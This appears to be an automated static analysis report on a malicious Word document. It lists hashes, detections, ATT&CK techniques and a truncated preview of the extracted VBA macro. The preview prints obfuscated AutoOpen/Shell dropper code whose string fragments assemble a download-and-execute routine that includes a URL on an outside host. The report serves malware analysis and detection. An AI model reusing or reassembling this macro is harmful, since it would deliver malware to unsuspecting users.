Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ba66f04789efa45a…

MALICIOUS

Office (OLE)

260.5 KB Created: 2017-12-28 07:33:00 Authoring application: Microsoft Office Word First seen: 2018-01-08
MD5: 2804fca78642cb4b6cd0dcf7ca1ff44a SHA-1: a52aa45f3393c3c8af12a2cf708c0f043b23508f SHA-256: ba66f04789efa45a1d190d16e135e2ffed567934d93041f686f1a5a75f7d72bb
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, indicating an attempt to execute external commands. This is further supported by the ClamAV detection of 'Img.Dropper.PhishingLure-6443153-0', suggesting a dropper or phishing lure. The VBA code is heavily obfuscated, but the presence of AutoOpen and Shell() calls strongly implies it's designed to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 101936 bytes
SHA-256: ee97d2cd3a545d6d305e7e3d1d62dfd9e2fc1c72703ec26b8e399fa6e5f51cc8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cwCfcXJ"
Function SANtdmVwroBwu()
On Error Resume Next
TAjkKQhB = (247 - Tan(733 * CInt(2865)) * KMwFciw - UPiibqwfvFckHO / (4772 - CStr(PXinTmRcizvZc) + iUmRw3 + CDate(HnZKnzEoPH / CDbl(SrmDLfzwThh - qfHDmEjjQVGoSD * 318 / Atn(8673))) * TQoaIWIBuiZ + CSng(TzdJraoif)))
QrNvjqfw = (247 - Tan(733 * CInt(2865)) * ZVBBGzaWlbUiM - XDmiqQmbub / (4772 - CStr(FoEqrmnVY) + iUmRw3 + CDate(KvDYqiUKurZjbp / CDbl(iEUBBwbanAIV - uphNnWNIjKz * 318 / Atn(8673))) * SQAjpVMPDJhS + CSng(XwiVQXiJoQ)))
qnzXOloQ = Mid("ZjDTtm0j);4qs+4qs'+'Y5Bka4qs+4qsrapas = 4qs+4qsY5BcN0QmakOmjpijRFzzYRu6iTds", 8, 43)
oTCCziofUPG = (247 - Tan(733 * CInt(2865)) * uSjjaOwlwkI - iffGZbh / (4772 - CStr(MYMmPjnLONd) + iUmRw3 + CDate(unWVrbwuEJ / CDbl(pJOTzilANAA - VFzRqalXk * 318 / Atn(8673))) * oKqJJOzi + CSng(ZDsXcBQpjcNQT)))
LVQqB = (247 - Tan(733 * CInt(2865)) * sbYwGLfXiDuX - zHrpMcrz / (4772 - CStr(AKjnprsSHW) + iUmRw3 + CDate(JaWHwGGIL / CDbl(mSlBzIuU - QDlYaNNTVniQ * 318 / Atn(8673))) * XIDYkktFVjnKOr + CSng(lrjwwYFMXCwtjn)))
szZsiQF = (247 - Tan(733 * CInt(2865)) * UAQuKFTSlviVDd - VXDiNaPchUPal / (4772 - CStr(vXqUQVJ) + iUmRw3 + CDate(UnZTHRwoHznBL / CDbl(KhGTFXi - uiiOqYsBmH * 318 / Atn(8673))) * cCPJtTzjsNR + CSng(jtpNJOzQlKvtu)))
RfvzQlO = Mid("wER0ZHMoGPPEpTEG4R4f4qBnw+Bnws+4qsge;}}4qs).REPlACe(VD", 21, 32)
PzTnahHBZI = (247 - Tan(733 * CInt(2865)) * UhuqvcwZXKac - TzNMWOhdEfRXRw / (4772 - CStr(VoqKRkOGPXw) + iUmRw3 + CDate(nSLoYvLsao / CDbl(XUGHQBcTdjSD - TPLKFqzoZtuL * 318 / Atn(8673))) * rtbGEEjFTqLcz + CSng(nETpUOc)))
SwmLHKi = (247 - Tan(733 * CInt(2865)) * IipXlSzG - njhRqnnuucW / (4772 - CStr(ZTBSlQMmwK) + iUmRw3 + CDate(lIwoLfUUpPh / CDbl(tKzthRNR - hojKnEz * 318 / Atn(8673))) * kTccIvI + CSng(wbPaHjHrGIIoX)))
HtsRzUDa = (247 - Tan(733 * CInt(2865)) * IkAmkruzbL - XKirWbOXdAZzhH / (4772 - CStr(KkFDazRWlqGR) + iUmRw3 + CDate(pKVPzhauEM / CDbl(NFqwUilSiwjKsX - zGozAPJthTfK * 318 / Atn(8673))) * AhrFXIpUHSBDFn + CSng(WIzdrOjUFHMhD)))
qGAjpYd = Mid("EdcN6wIhzFusdrPV1wBnwM6j4qs+4qs;Bnw+Bnw4qs+4qsf4qs+4qsor4qs+4qseach(4qs+4qsY5Babc 4wCw9kiI1", 19, 65)
HRIBYuhL = (247 - Tan(733 * CInt(2865)) * UltVETOdXaU - FwFkkOoAi / (4772 - CStr(zrwAjsEfwLiEz) + iUmRw3 + CDate(inqpdVEoGpbLl / CDbl(XtzWzinCYE - WZsdInAwOCzY * 318 / Atn(8673))) * XMmJlHYVGiHCMI + CSng(UDjOmCHw)))
GbtwmKY = (247 - Tan(733 * CInt(2865)) * FmiKWKwNliPT - PqzIYEKtmk / (4772 - CStr(aNcYqRzNob) + iUmRw3 + CDate(EFtNISSrdSrIM / CDbl(vbwQosTB - kJhaXUi * 318 / Atn(8673))) * fvXlsOK + CSng(sauHHjEQLupAzA)))
vbXwCoit = (247 - Tan(733 * CInt(2865)) * LzCbOXTa - AzksiQRfRP / (4772 - CStr(kavfsbKVjlwPQ) + iUmRw3 + CDate(wnFzGjOhhMI / CDbl(cZPwGlsFbk - WinMwrj * 318 / Atn(8673))) * kTRjdMh + CSng(fcCtjWUz)))
zitWsii = Mid("EWOjUpSaLqs/4qs+4qs,http:/4qs+4qs/vtour4q'+'s+4qss.r4qs+4qs'+'u/fu4qs+4qsiXaK6/4qs+4qsM6j4qs'+'+4qBnw+Bnws.S4qs+4qspl4qs+4qsit(M4q'+wqHaRRFFt", 10, 123)
jdoAsK = (247 - Tan(733 * CInt(2865)) * YDzJDasvXuQM - pbDNnVvRZ / (4772 - CStr(wAFROciiEfLwis) + iUmRw3 + CDate(HUzfWMq / CDbl(qakrcNbESz - BIwJiTtM * 318 / Atn(8673))) * hBrtKHjA + CSng(mCiIdOrdkBUcbt)))
fZrVJpMIK = (247 - Tan(733 * CInt(2865)) * DtQOpUjPnGbG - cOiHwYFLzkzE / (4772 - CStr(TIpaJlSfmRuzpr) + iUmRw3 + CDate(SwoQMkPlNw / CDbl(OTYGIRJvBYaNzq - EpwoHJjjswvjr * 318 / Atn(8673))) * EXbbMWwG + CSng(IcptqzslraY)))
DDddIpKjPiS = (247 - Tan(733 * CInt(2865)) * ZrzILVMdAipojr - VjbHjzatikSA / (4772 - CStr(srjFIsTSKYpb) + iUmRw3 + CDate(YiinZHmDfoB / CDbl(MAzwSYtVdl - ukjrYOLI * 318 / Atn(8673))) * jGZsPqKKNiMC + CSng(mvrTUrzwGwnZ)))
InqkzRi = Mid("DUvCTtZ5jfEmNIDD44kFHXsjXqs+4qsin4qs+4qs Y5Bb4qs+4Bnw+Bn'+'wqscBnw+Bnwd){t4Bnw+BnwqGzpEmUi", 26, 58)
tYLmliMfTs = (247 - Tan(733 * CInt(2865)) * ZoYqnhkfHNi - mwAwlkTpz / (4772 - CStr(oLSQqlAN) + iUmRw3 + CDate(JSdiiDk / CDbl(oObZuuXHtz - AGGjiQzNYXrwft 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.